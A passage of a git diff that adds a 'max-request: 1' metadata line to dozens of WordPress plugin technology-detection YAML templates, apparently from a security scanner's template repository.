b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 1778552d75..9c6e3e6d2e 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..a038adac53 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 